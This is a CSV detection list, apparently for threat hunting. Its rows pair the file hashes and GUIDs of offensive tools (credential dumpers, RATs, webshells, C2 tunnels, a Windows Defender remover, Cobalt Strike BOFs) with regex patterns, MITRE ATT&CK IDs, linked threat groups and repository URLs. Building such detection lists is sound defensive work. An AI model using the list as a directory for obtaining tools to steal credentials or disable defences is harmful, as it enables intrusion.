"*72efc44a791fceb9bc6e602fc079c8bf8139024dec0e580ed15f8c4fe80457bd*",".{0,1000}72efc44a791fceb9bc6e602fc079c8bf8139024dec0e580ed15f8c4fe80457bd.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","28946"
"*72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b*",".{0,1000}72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28947"
"*7307d71219a8bf7b0d62ab2975d4ea397dbcf3f277f3e4cdbcea58fe08f55b36*",".{0,1000}7307d71219a8bf7b0d62ab2975d4ea397dbcf3f277f3e4cdbcea58fe08f55b36.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28949"
"*73090c936c651512967306fe08af95b5ad4272012902fa53570806dd290b02f3*",".{0,1000}73090c936c651512967306fe08af95b5ad4272012902fa53570806dd290b02f3.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28950"
"*730b62e8a099a320ff72caf2e758cb15b04cbb123cd9fe8cc72dcffd80b8f214*",".{0,1000}730b62e8a099a320ff72caf2e758cb15b04cbb123cd9fe8cc72dcffd80b8f214.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28951"
"*73141d2560cc8922220ff44a83d36aa79e759ae349dea6300cf6c4adde81982d*",".{0,1000}73141d2560cc8922220ff44a83d36aa79e759ae349dea6300cf6c4adde81982d.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","28952"
"*7315b2a962905112c0a7172a5efbd5392d27b059a7c4a035eb38e39bcf2e19d1*",".{0,1000}7315b2a962905112c0a7172a5efbd5392d27b059a7c4a035eb38e39bcf2e19d1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28953"
"*732211ae-4891-40d3-b2b6-85ebd6f5ffff*",".{0,1000}732211ae\-4891\-40d3\-b2b6\-85ebd6f5ffff.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","#GUIDproject","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","28954"
"*73226E13-1701-424E-A4F2-3E4D575A1DD0*",".{0,1000}73226E13\-1701\-424E\-A4F2\-3E4D575A1DD0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","28955"
"*73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f*",".{0,1000}73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28956"
"*73273aa4152acec4126a3cb03e1b5afb4198e24bf3e71d426c3b14fc3dc066db*",".{0,1000}73273aa4152acec4126a3cb03e1b5afb4198e24bf3e71d426c3b14fc3dc066db.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28957"
"*7331b5c04c58757162a4448cc22df3483cbc4c38823a0e11026830f6cdfabf75*",".{0,1000}7331b5c04c58757162a4448cc22df3483cbc4c38823a0e11026830f6cdfabf75.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28959"
"*733238cfadd968469af3b91b6aa772958604f9bb1f3808ee7f5cb9870ddabdcb*",".{0,1000}733238cfadd968469af3b91b6aa772958604f9bb1f3808ee7f5cb9870ddabdcb.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","28960"
"*733366cd878504e71534180b9d93fa01139ff82e4cd2f61b15f1de71bd292fa7*",".{0,1000}733366cd878504e71534180b9d93fa01139ff82e4cd2f61b15f1de71bd292fa7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28961"
"*733a16c2eb4095398eab1a92ca5cea56a935f3df05a100fec3a1decda26d1e3f*",".{0,1000}733a16c2eb4095398eab1a92ca5cea56a935f3df05a100fec3a1decda26d1e3f.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","28963"
"*733b028d3299bcdcb8998b97939f0b57da0c66b62f52dbb48c29ca29b5c52b9a*",".{0,1000}733b028d3299bcdcb8998b97939f0b57da0c66b62f52dbb48c29ca29b5c52b9a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28964"
"*733C37D8-858F-44EE-9D17-790F7DE9C040*",".{0,1000}733C37D8\-858F\-44EE\-9D17\-790F7DE9C040.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","28965"
"*733dafd81c4cd0b7f5daa7b44a543a73a7e68587c006523c5ba12b017b1a2e69*",".{0,1000}733dafd81c4cd0b7f5daa7b44a543a73a7e68587c006523c5ba12b017b1a2e69.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28967"
"*733fe0591092a284f149d186d66f2435a6196769cd34f65909a23bdf1e907d84*",".{0,1000}733fe0591092a284f149d186d66f2435a6196769cd34f65909a23bdf1e907d84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28968"
"*73415a38d4b76dd2215d9fd81015b36a025018552f7847494f908f50c62fc8d2*",".{0,1000}73415a38d4b76dd2215d9fd81015b36a025018552f7847494f908f50c62fc8d2.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","#filehash","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","28969"
"*734c3a8ec0d442a49c7909702012c50ab2db32cfed02e82b5c19a5afda5a87d3*",".{0,1000}734c3a8ec0d442a49c7909702012c50ab2db32cfed02e82b5c19a5afda5a87d3.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","28970"
"*73510d6bd5ae0d698d510c6ed240d7e5cefd0a2111a3123ff68ef63329bafece*",".{0,1000}73510d6bd5ae0d698d510c6ed240d7e5cefd0a2111a3123ff68ef63329bafece.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28972"
"*73694f7f3a47359e3135c4da6e4eaab957047d9fc08ee8f0367d2beb5df4ca2f*",".{0,1000}73694f7f3a47359e3135c4da6e4eaab957047d9fc08ee8f0367d2beb5df4ca2f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28974"
"*736b362973af7010de9bf1cea58547a17a236e81a2084c344cf06a1b184698bb*",".{0,1000}736b362973af7010de9bf1cea58547a17a236e81a2084c344cf06a1b184698bb.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","#filehash","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","28975"
"*736c69887df76672923ad7ae8b1b1754f13f96d3ae5e2eea7259e29163af71d0*",".{0,1000}736c69887df76672923ad7ae8b1b1754f13f96d3ae5e2eea7259e29163af71d0.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","28976"
"*7372d0b75d0e1e78951d47c88fdba0bf2f04eedf7b12dde37afb87d2622b6426*",".{0,1000}7372d0b75d0e1e78951d47c88fdba0bf2f04eedf7b12dde37afb87d2622b6426.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28977"
"*73746146beb936f2c5fc328293b12683e1e893ba74f7c9f931a0e9fe1ab2d254*",".{0,1000}73746146beb936f2c5fc328293b12683e1e893ba74f7c9f931a0e9fe1ab2d254.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28978"
"*737bb1aff3cc22137328d202836fc2bca1f52c2bcae9ad2c786c8fc075a78580*",".{0,1000}737bb1aff3cc22137328d202836fc2bca1f52c2bcae9ad2c786c8fc075a78580.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28980"
"*73882b9c273a72eb49fc2854de8b37ef3012115c0e62267acb8b955a681ec312*",".{0,1000}73882b9c273a72eb49fc2854de8b37ef3012115c0e62267acb8b955a681ec312.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28982"
"*7388af6f44132b039881b25fbd8bac9caabee85246196f90c8952c4c25bd8f4d*",".{0,1000}7388af6f44132b039881b25fbd8bac9caabee85246196f90c8952c4c25bd8f4d.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28983"
"*738dd06fea4b4b507c0438eac77c8ed3267ed9617b51c565ea05f21529999164*",".{0,1000}738dd06fea4b4b507c0438eac77c8ed3267ed9617b51c565ea05f21529999164.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28984"
"*738f3dce5ad63a16b2cf8b236d8d374022f121c0990e92adc214a6d03b0dc345*",".{0,1000}738f3dce5ad63a16b2cf8b236d8d374022f121c0990e92adc214a6d03b0dc345.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","#filehash","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","28985"
"*73939d01fbba0a642ae8ab2df914bdae45187cf0cf131ae2ca5d37c05e8181c8*",".{0,1000}73939d01fbba0a642ae8ab2df914bdae45187cf0cf131ae2ca5d37c05e8181c8.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28986"
"*73948912-CEBD-48ED-85E2-85FCD1D4F560*",".{0,1000}73948912\-CEBD\-48ED\-85E2\-85FCD1D4F560.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","#GUIDproject","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","28987"
"*73a1461ab0925ac9df52dca7f7b3b2c8e46f25e440228c17d2c95c430bf22e68*",".{0,1000}73a1461ab0925ac9df52dca7f7b3b2c8e46f25e440228c17d2c95c430bf22e68.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","28989"
"*73ae5eca3016d96f296466bba035f6acd33bcb0a3a794338c9beae7eef10196b*",".{0,1000}73ae5eca3016d96f296466bba035f6acd33bcb0a3a794338c9beae7eef10196b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28990"
"*73aecc573cd5fa9b83875ab373a7ea718c02c2c2efdb7fcc8d84bda504d28ed9*",".{0,1000}73aecc573cd5fa9b83875ab373a7ea718c02c2c2efdb7fcc8d84bda504d28ed9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28991"
"*73af2b231655407f21245cfd079ee28ba711ff9cece86a0965673dffc0ebaafe*",".{0,1000}73af2b231655407f21245cfd079ee28ba711ff9cece86a0965673dffc0ebaafe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28992"
"*73b0c526db81c60a58abf4a5b7e6f6eb7959efb0b5b65c16afa105d74342a9ae*",".{0,1000}73b0c526db81c60a58abf4a5b7e6f6eb7959efb0b5b65c16afa105d74342a9ae.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28994"
"*73B2C22B-C020-45B7-BF61-B48F49A2693F*",".{0,1000}73B2C22B\-C020\-45B7\-BF61\-B48F49A2693F.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","#GUIDproject","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","28995"
"*73bfe881caa5f9e01efe86acede30ffd1a651d77bd7b884e2601064c18c7a215*",".{0,1000}73bfe881caa5f9e01efe86acede30ffd1a651d77bd7b884e2601064c18c7a215.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","28996"
"*73c18fc9053fdaa31ddff70920e31ea2e638d3012eeb795c51923ca1902a6c81*",".{0,1000}73c18fc9053fdaa31ddff70920e31ea2e638d3012eeb795c51923ca1902a6c81.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28997"
"*73c49b77b6b2e4032eacfc94d5e5e2bd185fc8ce7eba23ed4ca6921ceb631614*",".{0,1000}73c49b77b6b2e4032eacfc94d5e5e2bd185fc8ce7eba23ed4ca6921ceb631614.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","28998"
"*73c6754604666d7e05ed07db7ebc79fa3fe8d85cb049132c1b7b7d33181a70e6*",".{0,1000}73c6754604666d7e05ed07db7ebc79fa3fe8d85cb049132c1b7b7d33181a70e6.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#filehash","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","28999"
"*73db8fde14d109514c0734b7852e4a4307b5b4cc4cb6aa5aa15f601359e88740*",".{0,1000}73db8fde14d109514c0734b7852e4a4307b5b4cc4cb6aa5aa15f601359e88740.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29002"
